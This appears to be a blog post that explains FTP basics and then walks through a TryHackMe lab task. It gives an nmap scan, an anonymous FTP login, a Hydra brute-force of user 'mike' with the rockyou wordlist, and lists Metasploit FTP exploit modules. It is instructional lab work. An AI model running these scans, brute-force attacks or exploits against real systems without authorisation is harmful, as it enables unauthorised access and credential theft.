File Transfer Protocol (FTP) is a protocol used to allow remote transfer of files over a network. It uses a client-server model to do this, and relays commands and data in a very efficient way. The standard port is 21.
A typical FTP session operates using two channels:
- a command ( sometimes called the control ) channel
- a data channel
The command channel is used for transmitting commands as well as replies to those commands, while the data channel is used for transferring data.
FTP operates using a client-server protocol. The client initiates a connection with the server, the server validates whatever login credentials are provided and then opens the session.
While the session is open, the client may execute FTP commands on the server.
FTP has been around for a very long time. It is commonly used to efficiently upload/download files to/from a website or other location. If you are pen testing, chances are excellent that your target network will have an FTP server on it somewhere. Not all FTP servers are vulnerable. Exploits are often product- or version-specific.
So, to determine if there is an exploit for an FTP service, you must:
- Use a port scan to locate any FTP servers on the target network or host. Most FTP servers listen on TCP port 21.
- Banner grab or otherwise fingerprint the FTP service to determine the exact product and version number.
- Search for vulnerabilities or exploits for that version, or possibly write your own 0-day exploit.
Common FTP attacks include:
- Sniffing cleartext sessions—obtaining credentials and copies of files
- Buffer overflows—running arbitrary code or giving service accounts root shell access
- Denial-of-service/resource starvation attacks—consuming all of an FTP server’s disk space, CPU capacity, RAM, or permitted connections
- FTP bounce—using an FTP server as a middle man to open a connection and send commands to another server
- FTP anonymous login with read/write permissions—improperly allowing an unauthenticated user to upload files
- FTP directory traversal—allowing users to leave the FTP directory and browse the operating system’s directory structure
Tools for Enumeration and Exploitation of FTP
Tools that you can use to enumerate and exploit FTP include:
- Nmap
- port scanning including the -sV switch to discover services on non-standard ports
- nmap ftp-anon.nse
- ftp-brute.nse
- ftp-bounce.nse
- IIS-FTP.nse
- Metasploit modules:
- auxiliary/scanner/ftp/ftp_version
- auxiliary/scanner/ftp/ftp_login
- auxiliary/scanner/portscan/ftpbounce
- exploit/unix/ftp/proftpd_133c_backdoor
- exploit/unix/ftp/vsftpd_234_backdoor
- exploit/windows/ftp/ms09_053_ftpd_nlst
- exploit/linux/ftp/proftp_sreplace
Note: Metasploit has many FTP-related modules. To search for FTP exploits with a rank of Excellent, at an msfconsole, enter search exploit name:ftp -S excellent.
Note: For more information on FTP vulnerabilities, see https://www.netlab.tkk.fi/~puhuri/htyo/Tik-110.452/#conf-ftponly
Active vs Passive
The FTP server may support either Active or Passive connections, or both.
- In an Active FTP connection, the client opens a port and listens. The server is required to actively connect to it.
- In a Passive FTP connection, the server opens a port and listens (passively) and the client connects to it.
This separation is a way of being able to send commands to the server without having to wait for the current data transfer to finish. If both channels were interlinked, you could only enter commands in between data transfers, which wouldn’t be efficient for either large file transfers, or slow internet connections.
You can find more details on the technical function, and implementation of, FTP on the Internet Engineering Task Force website: https://www.ietf.org/rfc/rfc959.txt. The IETF is one of a number of standards agencies, who define and regulate internet standards.
Here is my walkthrough going through Task 6 in the Network Services box in TryHackMe:
https://tryhackme.com/room/networkservices
nmap -sS -sC -sV -p 21 TARGET_IP
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.00% done; ETC: 19:53 (0:03:17 remaining)
Nmap scan report for 10.10.93.95
Host is up (0.22s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
They left anonymous logon… why…..
ftp 10.10.93.95
Connected to 10.10.93.95.
220 Welcome to the administrator FTP service.
Name (10.10.93.95:kali): Anonymous
331 Please specify the password.
Password: [just type password here]
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 353 Apr 24 2020 PUBLIC_NOTICE.txt
226 Directory send OK.
ftp> get PUBLIC_NOTICE.txt
local: PUBLIC_NOTICE.txt remote: PUBLIC_NOTICE.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for PUBLIC_NOTICE.txt (353 bytes).
226 Transfer complete.
353 bytes received in 0.00 secs (175.2550 kB/s)
ftp>
The file is downloaded to the attacker box in the directory where the FTP session originated from. We got a possible username, mike, from the notice; new terminal!
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.93.95 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-07 20:24:40
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ftp://10.10.93.95:21/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 10.10.93.95 - login "mike" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.93.95 - login "mike" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.93.95 - login "mike" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.93.95 - login "mike" - pass "password" - 4 of 14344399 [child 3] (0/0)
[21][ftp] host: 10.10.93.95 login: mike password: password
[STATUS] attack finished for 10.10.93.95 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-07 20:24:57
We found the password, so use it dummy!
ftp 10.10.93.95
Connected to 10.10.93.95.
220 Welcome to the administrator FTP service.
Name (10.10.93.95:kali): mike
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Apr 24 2020 ftp
-rwxrwxrwx 1 0 0 26 Apr 24 2020 ftp.txt
226 Directory send OK.
ftp> get ftp.txt
local: ftp.txt remote: ftp.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ftp.txt (26 bytes).
226 Transfer complete.
26 bytes received in 0.00 secs (15.5010 kB/s)
ftp>